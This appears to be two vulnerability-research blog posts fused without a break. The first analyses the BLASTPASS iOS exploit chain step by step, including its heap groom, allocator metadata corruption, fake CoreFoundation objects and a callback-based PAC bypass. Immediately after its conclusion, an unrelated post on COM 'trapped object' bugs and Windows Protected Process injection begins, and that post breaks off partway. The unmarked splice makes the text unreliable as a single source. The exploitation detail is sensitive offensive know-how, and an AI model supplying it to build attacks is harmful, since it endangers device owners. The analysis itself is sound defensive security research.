I had a hunch that the bplist would use duplicate dictionary keys as a fundamental building block for the heap groom, but running my parser it didn't output any... until I realised that my tool stored the parsed dictionaries directly as python dictionaries before dumping them. Fixing the tools to instead keep lists of keys and values it became clear that there were duplicate keys. Lots of them:
In the Safari exploit writeup I described how I used different visualisation techniques to try to explore the structure of the objects, looking for patterns I could use to simplify what was going on. In this case, modifying the parser to emit well-formed curly brackets and indentation then relying on VS Code's automatic code-folding proved to work well enough for browsing around and getting a feel for the structure of the groom object.
Sometimes the right visualisation technique is sufficient to figure out what the exploit is trying to do. In this case, where the primitive is a heap-based buffer overflow, the groom will inevitably try to put two things next to each other in memory and I want to know "what two things?"
But no matter how long I stared and scrolled, I couldn't figure anything out. Time to try something different.
Instrumentation
I wrote a small helper to load the bplist using the same API as the MakerNote parser and ran it using the Mac Instruments app:
Parsing the single 5.5MB bplist causes nearly half a million allocations, churning through nearly a gigabyte of memory. Just looking through this allocation summary it's clear there's lots of CFString and CFData objects, likely used for heap shaping. Looking further down the list there are other interesting numbers:
The 20'000 in the last line is far too round a number to be a coincidence. This number matches up with the number of __NSDictionaryM objects allocated:
Finally, at the very bottom of the list there are two more allocation patterns which stand out:
There are two sets of very large allocations: eighty 1MB allocations and 44 4MB ones.
I modified my bplist tool again to dump out each unique string or data buffer, along with a count of how many times it was seen and its hash. Looking through the file listing there's a clear pattern:
Object Size
Count
0x3FFFFF
44
0xFFFFF
80
0x3FFF
20
0x26A9
24978
0x2554
44
0x23FF
5822
0x22A9
4
0x1FFF
2
0x1EA9
26
0x1D54
40
0x17FF
66
0x13FF
66
0x3FF
322
0x3D7
404
0xF
112882
0x8
3
There are a large number of allocations which fall just below a "round" number in hexadecimal: 0x3ff, 0x13ff, 0x17ff, 0x1fff, 0x23ff, 0x3fff... That heavily hints that they are sized to fall exactly within certain allocator size buckets.
Almost all of the allocations are just filled with zeros or 'A's. But the 1MB one is quite different:
Further on in the hexdump of the 1MB object there's clearly an NSExpression payload - this payload is also visible just running strings on the WebP file. Matthias Frielingsdorf from iVerify gave a talk at BlackHat Asia with an initial analysis of this NSExpression payload, we'll return to that at the end of this blog post.
Equally striking (and visible in the hexdump above): there are clearly pointers in there. It's too early in the analysis to know whether this is a payload which gets rebased somehow, or whether there's a separate ASLR disclosure step.
On a slightly higher level this hexdump looks a little bit like an Objective-C or C++ object, though some things are strange. Why are the first 24 bytes all zero? Why isn't there an isa pointer or vtable? It looks a bit like there are a number of integer fields before the pointers, but what are they? At this stage of the analysis, I had no idea.
Thinking dynamically
I had tried a lot to reproduce the exploit primitives on a real device; I built tooling to dynamically generate and sign legitimate PKPass files that I could send via iMessage to test devices and I could crash a lot, but I never seemed to get very far into the exploit - the iOS version range where the heap grooming works seems to be pretty small, and I didn't have an exact device and iOS version match to test on.
Regardless of what I tried: sending the original exploits via iMessage, sending custom PKPasses with the trigger and groom, rendering the WebP directly in a test app or trying to use the PassKit APIs to render the PKPass file the best I could manage dynamically was to trigger a heap metadata integrity check failure, which I assumed was indicative of the exploit failing.
(Amusingly, using the legitimate APIs to render the PKPass inside an app failed with an error that the PKPass file was malformed. And indeed, the exploit sample PKPass is malformed: it's missing multiple required files. But the "secure" PKPass BlastDoor parser entrypoint (PKPassSecurePreviewContextCreateMessagesPreview) is, in this regard at least, less strict and will attempt to render an incomplete and invalid PKPass).
Though getting the whole PKPass parsed was proving tricky, with a bit of reversing it was possible to call the correct underlying CoreGraphics APIs to render the WebP and also get the EXIF/MakerNote parsed. By then setting a breakpoint when the huffman tables were allocated I had hoped it would be obvious what the overflow target was. But it was actually totally unclear what the following object was: (Here X3 points to the start of the huffman tables which are 0x3000 bytes large)
The first qword (0x111800000) is a valid pointer, but this is clearly not an Objective-C object, nor did it seem to look like any other recognizable object or have much to do with either the bplist or WebP. But running the tests a few times, there was a curious pattern:
The huffman table is 0x2F28 bytes, which the allocator rounds up to 0x3000. And in both of those test runs, adding the allocation size to the huffman table pointer yielded a suspiciously round number. There's no way that's a coincidence. Running a few more tests the table+0x3000 pointer is always 8MB aligned. I remembered from some presentations on the iOS userspace allocator I'd read that 8MB is a meaningful number. Here's one from Synaktiv:
8MB is the size of the iOS userspace default allocator's small rack regions. It looks like they might be trying to groom the allocator not to target application-specific data but allocator metadata. Time to dive into some libmalloc internals!
libmalloc
I'd suggest reading the two presentations linked above for a good overview of the iOS default userspace malloc implementation. Libmalloc manages memory on four levels of abstraction. From largest to smallest those are: rack, magazine, region and block. The size split between the tiny, small and large racks depends on the platform. Almost all the relevant allocations for this exploit come from the small rack, so that's the one I'll focus on.
Reading through the libmalloc source I noticed that the region trailer, whilst still called a trailer, has been now moved to the start of the region object. The small region manages memory in chunks of 8MB. That 8MB gets split up in to (for our purposes) three relevant parts: a header, an array of metadata words, then blocks of 512 bytes which form the allocations:
The first 0x28 bytes are a header where the first two fields form a linked-list of small regions:
typedefstructregion_trailer{
structregion_trailer*prev;
structregion_trailer*next;
unsignedbytes_used;
unsignedobjects_in_use;
mag_index_tmag_index;
volatileint32_tpinned_to_depot;
boolrecirc_suitable;
rack_dispose_flags_tdispose_flags;
}region_trailer_t;
The small region manages memory in units of 512 bytes called blocks. On iOS allocations from the small region consist of contiguous runs of up to 31 blocks. Each block has an associated 16-bit metadata word called a small meta word, which itself is subdivided into a "free" flag in the most-significant bit, and a 15-bit count.
To mark a contiguous run of blocks as in-use (belonging to an allocation) the first meta word has its free flags cleared and the count set to the number of blocks in the run. On free, an allocation is first placed on a lookaside list for rapid reuse without freeing. But once an allocation really gets freed the allocator will attempt to greedily coalesce neighbouring chunks. While in-use runs can never exceed 31 blocks, free runs can grow to encompass the entire region.
The groom
Below you can see the state of the meta words array for the small region directly following the one containing the huffman table as its last allocation:
With some simple maths we can convert indexes in the meta words array into their corresponding heap pointers. Doing that it's possible to dump the memory associated with the allocations shown above. The larger 0x19, 0x18 and 0x1c allocations all seem to be generic groom allocations, but the two 0x3 block allocations appear more interesting. The first one (with the first metadata word at 0x14800005a, shown in yellow) is the code_lengths array which gets freed directly after the huffman table building fails. The blue 0x3 block run (with the first metadata word at 0x148000090) is the backing buffer for a CFSet object from the MakerNote and contains object pointers.
Recall that the corruption primitive will write the dword 0x2700070x58 bytes off the end of the 0x3000 allocation (and that allocation happens to sit directly in front of this small region). That corruption has the following effect (shown in bold):
It's changed the size of an in-use allocation from 3 blocks to 39 (or from 1536 to 19968 bytes). I mentioned before that the maximum size of an in-use allocation is meant to be 31 blocks, but this doesn't seem to be checked in every single free path. If things don't quite work out, you'll hit a runtime check. But if things do work out you end up with a situation like this:
The yellow (0x8027) allocation now extends beyond its original three blocks and completely overlaps the following green (0x18) and blue (0x3) as well as the start of the purple (0x1c) allocation.
But as soon as this corruption occurs WebP parsing fails and it's not going to make any other allocations. So what are they doing? How are they able to leverage these overlapping allocations? I was pretty stumped.
One theory was that perhaps it was some internal ImageIO or BlastDoor specific object which reallocated the overlapping memory. Another theory was that perhaps the exploit had two parts; this first part which puts overlapping entries on the allocator freelist, then another file which is sent to exploit that? And maybe I was lacking that file? But then, why would there be that huge 1MB payload with NSExpressions in it? That didn't add up.
Puzzling pieces
As is so often the case, stepping back and not thinking about the problem for a while I realised that I'd completely overlooked and forgotten something critical. Right at the very start of the analysis I had run file on all the files inside the PKPass and noted that background.png was actually not a png but a TIFF. I had then completely forgotten that. But now the solution seemed obvious: the reason to use a PKPass versus just a WebP is that the PKPass parser will render multiple images in sequence, and there must be something in the TIFF which reallocates the overlapping allocation with something useful.
Libtiff comes with a suite of tools for parsing tiff files. tiffdump displays the headers and EXIF tags:
This dumps the uncompressed TIFF strip buffer and this looks much more interesting! There's clearly some structure, though not a lot of it. Is this really enough to do something useful? It looks like there could be some sort of object, but I didn't recognise the structure, and had no idea how replacing an object with this would be useful. I explored two possibilities:
1) Alpha blending:
This is actually the raw TIFF strip after decompression but before the rendering step which applies the alpha, so it was possible that this got rendered "on top" of another object. That seemed like a reasonable explanation for why the object seemed so sparse; perhaps the idea was to just "move" a pointer value. The first 16 bytes of the strip look like this:
00 00 00 00 00 00 00 00 84 13 00 00 01 00 00 00
which when viewed as two 64-bit values look like this:
0x0000000000000000 0x0000000100001384
It seemed sort-of plausible that rendering the 0x100001384 on top of another pointer might be a neat primitive, but there was something that didn't quite add up. This pointer-ish value is at the start of the strip buffer, so if the overlapping allocation got reallocated with this strip buffer directly, nothing interesting would happen, as the overlapping parts are further along. Maybe the overlapping buffer gets split up multiple times, but this was seeming less and less likely, and I couldn't reproduce this part of the exploit to actually observe what happened.
2) This is an object:
The other theory I had was that this actually was an object. The 8 zero bytes at the start were certainly strange… so then what's the significance of the next 8 bytes?
84 13 00 00 01 00 00 00
I tried using lldb's memory find command to see if there were other instances of that exact byte sequence occurring in a test iOS app rendering the WebP then the TIFF using the CoreGraphics APIs:
They're not identical, but it seemed a strange coincidence.
I took a bunch of test app core dumps using lldb's process save-core command and wrote some simple code to search for similar-ish byte patterns. After some experimentation I managed to find something:
It's an NSCFArray, which is the Foundation (Objective-C) "toll-free bridged" version of the Core Foundation (C) CFArray type! This was the hint that I was looking for to identify the significance of the TIFF and that 1MB groom object, which also contains a similar byte sequence.
Cores and Foundations
Even though Apple hasn't updated the open-source version of CoreFoundation for almost a decade, the old source is still helpful. Here's what a CoreFoundation object looks like:
So the header is an Objective-C isa pointer followed by four bytes of _cfinfo, followed by a reference count. Taking a closer look at the uses of __cfinfo:
It seems that the second byte in __cfinfo is a type identifier. And indeed, running expr (int) CFArrayGetTypeID() in lldb prints: 19 (0x13) which matches up with both the object found in the coredump as well as the strange (or now not so strange) object in the TIFF strip buffer.
X steps forwards, Y steps back
Looking through more of the CoreFoundation code it seems that the object in the TIFF strip buffer is a CFArray with inline storage containing one element with the value 0x1234abcd. It also seems that it's possible for CF objects to have NULL isa pointers, which explains why the first 8 bytes of the fake object are zero.
This is interesting, but it still doesn't actually get us any closer to figuring out what the next step of the exploit actually is. If the CFArray is meant to overlap with something, then what? And what interesting side-effects could having an CFArray with only a single element with the value 0x1234abcd possibly have?
This seems like one step forward and two steps back, but there's something else which we can now figure out: what that 1MB groom object actually is. Let's take a look at the start of it again:
It looks like another CF object, starting at +0x10 in the buffer with the same NULL isa pointer, a reference count of 1 and a __cfinfo of {0x80, 0x26, 0, 0}. The type identifiers aren't actually fixed, they're allocated dynamically via calls to _CFRuntimeRegisterClass like this:
The CFTypeIDs are really just indexes into the __CFRuntimeClassTable array, and even though the types are allocated dynamically the ordering seems sufficiently stable that the hardcoded type values in the exploit work. 0x26 is the CFTypeID for CFReadStream:
struct_CFStream{
CFRuntimeBase_cfBase;
CFOptionFlagsflags;
CFErrorReferror;
struct_CFStreamClient*client;
void*info;
conststruct_CFStreamCallBacks*callBacks;
CFLock_tstreamLock;
CFArrayRefpreviousRunloopsAndModes;
dispatch_queue_tqueue;
};
Looking through the CFStream code it seems to call various callback functions during object destruction — that seems like a very likely path towards code execution, though with some significant caveats:
Caveat I: It's still unclear how an overlapping allocation in the small malloc region could lead to a CFRelease being called on this 1MB allocation.
Caveat II: What about ASLR? There have been some tricks in the past targeting "universal gadgets" which work across multiple slides. Nemo also had a neat objective-c trick for defeating ASLR in the past, so it's plausible that there's something like that here.
Caveat III: What about PAC? If it's a data-only attack then maybe PAC isn't an issue, but if they are trying to JOP they'd need a trick beyond just an ASLR leak, as all forward control flow edges should be protected by PAC.
Special Delivery
Around this time in my analysis Matthias Frielingsdorfoffered me the use of an iPhone running 16.6, the same version as the targeted ITW victim. With Matthias' vulnerable iPhone, I was able to use the Dopamine jailbreak to attach lldb to MessagesBlastDoorService and after a few tries was able to reproduce the exploit right up to the CFRelease call on the fake CFReadStream, confirming that that part of my analysis was correct!
Collecting a few crashes led, yet again, to even more questions...
Caveat I:Mysterious Pointers
Similar to the analysis of the huffman tables, there was a clear pattern in the fake object pointers, which this time were even stranger than the huffman tables. The crash site was here:
LDRX8,[X19,#0x30]
LDRX8,[X8,#0x58]
At this point X19 points to the fake CFReadStream object, and collecting a few X19 values there's a pretty clear pattern:
0x000000075f000010
0x0000000d4f000010
The fake object is inside a 1MB heap allocation, but all those fake object addresses are always 16 bytes above a 16MB-aligned address. It seemed really strange to me to end up with a pointer 0x10 bytes past such a round number. What kind of construct would lead to the creation of such a pointer? Even though I did have a debugger attached to MessagesBlastDoorService, it wasn't a time-travel debugger, so figuring out the history of such a pointer was non-trivial. Using the same core dump analysis techniques I could see that the pointer which would end up in X19 was also present in the backing buffer of the CFSet described earlier. But how did it get there?
Having found the strange CFArray inside the TIFF I was heavily biased towards believing that this must have something to do with it, so I wrote some tooling to modify the fake CFArray's in the TIFF in the exploit. The theory was that by messing with that CFArray, I could cause a crash when it was used and figure out what was going on. But making minor changes to the strip buffer didn't seem to have any effect — the exploit still worked! Even replacing the entire strip buffer with A's didn't stop the exploit working... What's going on?
Stepping back
I had made a list of the primitives I thought might lead to the creation of such a strange looking pointer — first on the list was a partial pointer overwrite. But then why the CFArray? But now having shown that the CFArray can't be involved, it was time to go back to the list. And step back even further and make sure I'd really looked at all of that TIFF...
There were still those four other metadata buffers in the tiffdump output I'd shown earlier:
I'd just dismissed them, but, maybe I shouldn't have done that? I had actually already dumped the full contents of each of those buffers and checked that there wasn't something else apart from the zeros. They were all zeros, except the third-to-last bytes which were 0x10, which I'd considered completely uninteresting. Uninteresting, unless you wanted to partially overwrite the three least-significant bytes of a little-endian pointer value with 0x000010 that is!
Each of those four metadata buffers in the TIFF is 15347 bytes, which is 0x3bf3 — looked at another way that's 0x3c00 (the size rounded up to the next 0x200 block size), minus 5, minus 8.
0x3c00 is exactly 30 0x200 byte blocks. Each 16-bit word in the metadata array shown above corresponds to one 0x200 block, where the overlapping chunk in yellow starts at 0x14800005a. Counting forwards 30 chunks means that the end of a 0x3c00 allocation overlaps perfectly with the end of the original blue three-chunk allocation:
This has the effect of overwriting all but the last 16 bytes of the blue allocation with zeros, then overwriting the three least-significant bytes of the second-to-last pointer-sized value with 0x10 00 00; which, if that memory happened to contain a pointer, has the effect of "shifting" that pointer down to the nearest 16MB boundary, then adding 0x10 bytes! (For those who saw my 2024 Offensivecon talk, this was the missing link between the overlapping allocations and code execution I mentioned.)
As mentioned earlier, that blue allocation starting with 0x0003 is the backing buffer of a CFSet object from the bplist inside the WebP MakerNote. The set is constructed in a very precise fashion such that the target pointer (the one to be rounded down) ends up as the second-to-last pointer in the backing buffer. The 1MB object is then also groomed such that it falls on a 16MB boundary below the object which the CFSet entry originally points to. Then when that CFSet is destructed it calls CFRelease on each object, causing the fake CFReadStream destructor to run.
Caveat II: ASLR
We've looked at the whole flow from huffman table overflow to CFRelease being invoked on a fake CFReadStream — but there's still stuff missing. The second open question I discussed earlier was ASLR. I had theorised that maybe it used a trick like a universal gadget, but is that the case?
In addition to the samples, I was also able to obtain a number of crash logs from failed exploit attempts where those samples were thrown, which meant I could figure out the ASLR slide of the MessagesBlastDoorService when the exploit failed. In combination with the target device and exact OS build (also contained in the crash log) I could then obtain the matching dyld_shared_cache, subtract the runtime ASLR slide from a bunch of the pointer-looking things in the 1MB object and take a look at them.
The simple answer is: the 1MB object contains a large number of hardcoded, pre-slid, valid pointers. There's no weird machine, tricks or universal gadget here. By the time the PKPass is built and sent by the attackers they already know both the target device type and build as well as the runtime ASLR slide of the MessagesBlastDoorService...
In the years since PAC was introduced we've seen a whole spectrum of interesting ways to either defeat, or just avoid, PAC. So what did these attackers do? To understand that let's follow the CFReadStream destruction code closely. (All these code snippets are from the most recently available version of CF from 2015, but the code doesn't seem to have changed much.)
Here's the definition of the CFReadStream:
staticconstCFRuntimeClass__CFReadStreamClass={
0,
"CFReadStream",
NULL,// init
NULL,// copy
__CFStreamDeallocate,
NULL,
NULL,
NULL,// copyHumanDesc
__CFStreamCopyDescription
};
When a CFReadStream is passed to CFRelease, it will call __CFStreamDeallocate:
staticvoid__CFStreamDeallocate(CFTypeRefcf){
struct_CFStream*stream=(struct_CFStream*)cf;
conststruct_CFStreamCallBacks*cb=
_CFStreamGetCallBackPtr(stream);
CFAllocatorRefalloc=CFGetAllocator(stream);
_CFStreamClose(stream);
_CFStreamGetCallBackPtr just returns the CFStream's callBacks field:
That gives a status code of 0x1f with all the other flags bits clear. This gets through the two conditional branches to reach this close callback call:
At this point we need to switch to looking at the assembly to see what's really happening:
__CFStreamClose
var_30=-0x30
var_20=-0x20
var_10=-0x10
var_s0=0
PACIBSP
STPX24,X23,[SP,#-0x10+var_30]!
STPX22,X21,[SP,#0x30+var_20]
STPX20,X19,[SP,#0x30+var_10]
STPX29,X30,[SP,#0x30+var_s0]
ADDX29,SP,#0x30
MOVX19,X0
BL__CFStreamGetStatus
CBZX0,loc_187076958
The fake CFReadStream is the first argument to this function, so passed in the X0 register. It's then stored into X19 so it survives the call to __CFStreamGetStatus.
Skipping ahead past the flag checks we reach the callback callsite (this is also the crash site seen earlier):
LDRX8,[X19,#0x30]
...
LDRX8,[X8,#0x58]
CBZX8,loc_187076758
LDRX1,[X19,#0x28]
MOVX0,X19
BLRAAZX8
Let's walk through each instruction in turn there:
First it loads the 64-bit value from X19+0x30 into X8:
LDRX8,[X19,#0x30]
Looking at the hexdump of the 1MB object above this will load the value 0x25846ec20.
From the crash reports we know the runtime ASLR slide of the MessagesBlastDoorService when this exploit was thrown was 0x3A8D0000, so subtracting that we can figure out where in the shared cache this pointer should point:
0x25846ec20-0x3A8D0000=0x21DB9EC20
It points into the __const segment of the TextToSpeechMauiSupport library in the shared cache:
The next instruction adds 0x58 to that TextToSpeechMauiSupport pointer and reads a 64-bit value from there:
LDRX8,[X8,#0x58]//x8:=[0x21DB9EC20+0x58]
This loads the pointer to the function _DataSectionWriter_CommitDataBlock from 0x21DB9EC78.
IDA is simplifying something for us here: the function pointer loaded there is actually signed with the A-family instruction key with a zero context. This signing happens transparently (either during load or when the page is faulted in).
The remaining four instructions then check that the pointer wasn't NULL, load X1 from offset +0x28 in the fake 1MB object, move the pointer to the fake object back into X0 and call the PAC'ed _DataSectionWriter_CommitDataBlock function pointer via BLRAAZ:
CBZX8,loc_187076758
LDRX1,[X19,#0x28]
MOVX0,X19
BLRAAZX8
Callback-Oriented Programming
A well-known attack against PAC is to swap two valid, PAC'ed pointers which are signed in the same way but point to different places (e.g. swapping two function pointers with different semantics, allowing you to exploit those semantic differences).
Since a large number of PAC-protected pointers are signed with the A-family instruction key with a zero-context value, there are a large number of pointers to choose from. "Just" having an ASLR defeat shouldn't be enough to achieve this though; surely you'd need to disclose the actual PAC'ed pointer value? But that's not what happened above.
Notice that the CFStream objects don't directly contain the callback function pointers — there's an extra level of indirection. The CFStream object contains a pointer to a callback structure, and that structure has the PAC'd function pointers. And crucially: that first pointer, the one to the callbacks structure, isn't protected by PAC. This means that the attackers can freely swap pointers to callback structures, operating one-level removed from the function pointers.
This might seem like a severe constraint, but the dyld_shared_cache is vast and there are easily enough pre-existing callback structures to build a "callback-oriented JOP" chain, chaining together unsigned pointers to signed function pointers.
The initial portion of the payload is a large callback-oriented JOP chain which is used to bootstrap the evaluation of the next payload stage, a large NSExpression.
Similarities
There are a number of similarities between this exploit chain and PWNYOURHOME, an earlier exploit also attributed by CitizenLab to NSO, described in this blog post in April 2023.
That chain also had an initial stage targeting HomeKit, followed by a stage targeting MessagesBlastDoorService and also involving a MakerNote object — the Citizen Lab post claims that at the time the MakerNote was inside a PNG file. My guess would be that that PNG was being used as the delivery mechanism for the MakerNote bplist heap grooming primitives discussed in this post.
Based on Citizen Lab's description it also seems like PWNYOURHOME was leveraging a similar callback-oriented JOP technique, and it seems likely that there was also a HomeKit-based ASLR disclosure. The PWNYOURHOME post has a couple of extra details around a minor fix which Apple made, preventing parsing of "certain HomeKit messages unless they arrive from a plausible source." But there still aren't enough details to figure out the underlying vulnerability or primitive. It seems likely to me that the same issue, or a variant thereof was still in use in BLASTPASS.
Key material
Matthias from iVerify presented an initial analysis of the NSExpression payload at BlackHat Asia in April 2024. In early July 2024, Matthias and I took a closer look at the final stages of the NSExpression payload which decrypts an AES-encrypted NSExpression and executes it.
It seems very likely that the encrypted payload contains a BlastDoor sandbox escape. Although the BlastDoor sandbox profile is fairly restrictive it still allows access to a number of system services like notifyd, logd and mobilegestalt. In addition to the syscall attack surface there's also a non-trivial IOKit driver attack surface:
In FORCEDENTRY the sandbox escape was contained directly in the NSExpression payload (though that was an escape from the less-restrictive IMTranscoderAgent sandbox). This time around it seems extra care has been taken to prevent analysis of the sandbox escape.
The question is: where does the key come from? We had a few theories:
Perhaps the key is just obfuscated, and by completely reversing the NSExpression payload we can find it?
Perhaps the key is derived from some target-specific information?
Perhaps the key was somehow delivered in some other way and can be read from inside BlastDoor?
We spent a day analysing the NSExpression payload and concluded that the third theory appeared to be the correct one. The NSExpression walks up the native stack looking for the communication ports back to imagent. It then hijacks that communication, effectively taking over responsibility for parsing all subsequent incoming requests from imagent for "defusing" of iMessage payloads. The NSExpression loops 100 times, parsing incoming requests as XPC messages, reading the request xpc dictionary then the dataxpc data object to get access to the raw, binary iMessage format. It waits until the device receives another iMessage with a specific format, and from that message extracts an AES key which is then used to decrypt the next NSExpression stage and evaluate it.
We were unable to recover any messages with the matching format and therefore unable to analyse the next stage of the exploit.
Conclusion
In contrast to FORCEDENTRY, BLASTPASS's separation of the ASLR disclosure and RCE phases mitigated the need for a novel weird machine. Whilst the heap groom was impressively complicated and precise, the exploit still relied on well-known exploitation techniques. Furthermore, the MakerNote bplist groom and callback-JOP PAC defeat techniques appear to have been in use for multiple years, based on similarities with Citizenlab's blogpost in 2023, which looked at devices compromised in 2022.
Enforcing much stricter requirements on the format of the bplist inside the MakerNote (for example: a size limit or a strict-parser mode which rejects duplicate keys) would seem prudent. The callback-JOP issue is likely harder to mitigate.
The HomeKit aspect of the exploit chain remains mostly a mystery, but it seems very likely that it was somehow involved in the ASLR disclosure. Samuel Groß's post "A Look at iMessage in iOS 14" in 2021, mentioned that Apple added support for re-randomizing the shared cache slide of certain services. Ensuring that BlastDoor has a unique ASLR slide could be a way to mitigate this.
This is the second in-the-wild NSO exploit which relied on simply renaming a file extension to access a parser in an unexpected context which shouldn't have been allowed.
FORCEDENTRY had a .gif which was really a .pdf.
BLASTPASS had a .png which was really a .webp.
A basic principle of sandboxing is treating all incoming attacker-controlled data as untrusted, and not simply trusting a file extension.
This speaks to a broader challenge in sandboxing: that current approaches based on process isolation can only take you so far. They increase the length of an exploit chain, but don't necessarily reduce the size of the initial remote attack surface. Accurately mapping, then truly reducing the scope of that initial remote attack surface should be a top priority.
Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server.
This flexibility has a number of downsides, one of which is the topic of this blog, the trapped object bug class. Not all objects which can be remoted are necessarily safe to do so. For example, the previously mentioned XML libraries, in both COM and .NET, support executing arbitrary script code in the context of an XSLT document. If an XML document object is made accessible over the boundary, then the client could execute code in the context of the server process, which can result in privilege escalation or remote-code execution.
There are a number of scenarios that can introduce this bug class. The most common is where an unsafe object is shared inadvertently. An example of this was CVE-2019-0555. This bug was introduced because when developing the Windows Runtime libraries an XML document object was needed. The developers decided to add some code to the existing XML DOM Document v6 COM object which exposed the runtime specific interfaces. As these runtime interfaces didn't support the XSLT scripting feature, the assumption was this was safe to expose across privilege boundaries. Unfortunately a malicious client could query for the old IXMLDOMDocument interface which was still accessible and use it to run an XSLT script and escape a sandbox.
Another scenario is where there exists an asynchronous marshaling primitive. This is where an object can be marshaled both by value and by reference and the platform chooses by reference as the default mechanism, For example the FileInfo and DirectoryInfo .NET classes are both serializable, so can be sent to a .NET remoting service marshaled by value. But they also derive from the MarshalByRefObject class, which means they can be marshaled by reference. An attacker can leverage this by sending to the server a serialized form of the object which when deserialized will create a new instance of the object in the server's process. If the attacker can read back the created object, the runtime will marshal it back to the attacker by reference, leaving the object trapped in the server process. Finally the attacker can call methods on the object, such as creating new files which will execute with the privileges of the server. This attack is implemented in my ExploitRemotingService tool.
The final scenario I'll mention as it has the most relevancy to this blog post is abusing the built in mechanisms the remoting technology uses to lookup and instantiate objects to create an unexpected object. For example, in COM if you can find a code path to call the CoCreateInstance API with an arbitrary CLSID and get that object passed back to the client then you can use it to run arbitrary code in the context of the server. An example of this form is CVE-2017-0211, which was a bug which exposed a Structured Storage object across a security boundary. The storage object supports the IPropertyBag interface which can be used to create an arbitrary COM object in the context of the server and get it returned to the client. This could be exploited by getting an XML DOM Document object created in the server, returned to the client marshaled by reference and then using the XSLT scripting feature to run arbitrary code in the context of the server to elevate privileges.
Where Does IDispatch Fits In?
The IDispatch interface is part of the OLE Automation feature, which was one of the original use cases for COM. It allows for late binding of a COM client to a server, so that the object can be consumed from scripting languages such as VBA and JScript. The interface is fully supported across process and privilege boundaries, although it's more commonly used for in-process components such as ActiveX.
To facilitate calling a COM object at runtime the server must expose some type information to the client so that it knows how to package up parameters to send via the interface's Invoke method. The type information is stored in a developer-defined Type Library file on disk, and the library can be queried by the client using the IDispatch interface's GetTypeInfo method. As the COM implementation of the type library interface is marshaled by reference, the returned ITypeInfo interface is trapped in the server and any methods called upon it will execute in the server's context.
The ITypeInfo interface exposes two interesting methods that can be called by a client, Invoke and CreateInstance. It turns out Invoke is not that useful for our purposes, as it's not supported for remoting, it can only be called if the type library is loaded in the current process. However, CreateInstance is implemented as remotable, this will instantiate a COM object from a CLSID by calling CoCreateInstance. Crucially the created object will be in the server's process, not the client.
However, if you look at the linked API documentation there is no CLSID parameter you can pass to CreateInstance, so how does the type library interface know what object to create? The ITypeInfo interface represents any type which can be present in a type library. The type returned by GetTypeInfo just contains information about the interface the client wants to call, therefore calling CreateInstance will just return an error. However, the type library can also store information of "CoClass" types. These types define the CLSID of the object to create, and so calling CreateInstance will succeed.
How can we go from the interface type information object, to one representing a class? The ITypeInfo interface provides us with the GetContainingTypeLib method which returns a reference to the containing ITypeLib interface. That can then be used to enumerate all supported classes in the type library. It's possible one or more of the classes are not safe if exposed remotely. Let's go through a worked example using my OleView.NET PowerShell module, first we want to find some target COM services which also support IDispatch. This will give us potential routes for privilege escalation.
The -Service switch for Get-ComClass returns classes which are implemented in local services. We then query for all the supported interfaces, we don't need the output from this command as the queried interfaces are stored in the Interfaces property. Finally we select out any COM class which exposes IDispatch resulting in 5 candidates. Next, we'll pick the first class, WaasRemediation and inspect its type library for interesting classes.
The script creates the COM object and then uses theImport-ComTypeLib command to get the type library interface. We can check that the type library interface is really running out of process by marshaling it with Get-ComObjRef then extracting the process information, showing it running in an instance of svchost.exe which is the shared service executable. Inspecting the type library through the interface is painful, to make it easier to display what classes are supported, we can parse the library into an easier to use object model with the Parse method. We can then dump information about the library, including a list of its classes.
Unfortunately for this COM object the only classes the type library supports are already registered to run in the service and so we've gained nothing. What we need is a class that is only registered to run in the local process, but is exposed by the type library. This is a possibility as a type library could be shared by both local in-process components and an out-of-process service.
I inspected the other 4 COM classes (one of which is incorrectly registered and isn't exposed by the corresponding service) and found no useful classes to try and exploit. You might decide to give up at this point, but it turns out there are some classes accessible, they're just hidden. This is because a type library can reference other type libraries, which can be inspected using the same set of interfaces. Let's take a look:
In the example we can use the ReferencedTypeLibs property to show what type libraries were encountered when the library was parsed. We can see a single entry for the stdole which is basically always going to be imported. If you're lucky, maybe there's other libraries that are imported that you can inspect. We can parse the stdole library to inspect its list of classes. There's two classes that are exported by the type library, if we inspect the servers for StdFont we can see that it is only specified to be creatable in process, we now have a target class to look for bugs. To get an out of process interface for the stdole type library we need to find a type which references it. The reason for the reference is that common interfaces such as IUnknown and IDispatch are defined in the library, so we need to query the base type of an interface we can directly access. Let's try to create the object in the COM service.
We query the base type of an existing interface through a combination of GetRefTypeOfImplType and GetRefTypeInfo, then use GetContainingTypeLib to get the referenced type library interface. We can parse the library to be confident that we've got the stdole library. Next we get the type info for the StdFont class and call CreateInstance. We can inspect the object's process to ensure it was created out of process, the results shows its trapped in the service process. As a final check we can query for the object's interfaces to prove that it's a font object.
Now we just need to find a way of exploiting one of these two classes, the first problem is only the StdFont object can be accessed. The StdPicture object does a check to prevent it being used out of process. I couldn't find useful exploitable behavior in the font object, but I didn't spend too much time looking. Of course, if anyone else wants to look for a suitable bug in the class then go ahead.
This research was therefore at a dead end, at least as far as system services go. There might be some COM server accessible from a sandbox but an initial analysis of ones accessible from AppContainer didn't show any obvious candidates. However, after thinking a bit more about this I realized it could be useful as an injection technique into a process running at the same privilege level. For example, we could hijack the COM registration for StdFont, to point to any other class using the TreatAs registry key. This other class would be something exploitable, such as loading the JScript engine into the target process and running a script.
Still, injection techniques are not something I'd usually discuss on this blog, that's more in the realm of malware. However, there is a scenario where it might have interesting security implications. What if we could use this to inject into a Windows Protected Process? In a strange twist of fate, the WaaSRemediationAgent class we've just been inspecting might just be our ticket to ride:
When we inspect the protection level for the hosting service it's configured to run at the PPL-Windows level! Let's see if we can salvage some value out of this research.
Protected Process Injection
I've blogged (and presented) on the topic of injecting into Windows Protected Processes before. I'd recommend re-reading that blog post to get a better background of previous injection attacks. However, one key point is that Microsoft does not consider PPL a security boundary and so they won't generally fix any bugs in a security bulletin in a timely manner, but they might choose to fix it in a new version of Windows.
The idea is simple, we'll redirect the StdFont class registration to point to another class so that when we create it via the type library it'll be running the protected process. Choosing to use StdFont should be more generic as we could move to using a different COM server if WaaSRemediationAgent is removed. We just need a suitable class which gets us arbitrary code execution which also works in a protected process.
